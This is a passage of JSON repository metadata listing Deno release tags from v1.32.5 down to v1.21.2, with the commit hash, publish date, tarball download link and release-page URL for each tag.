oland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_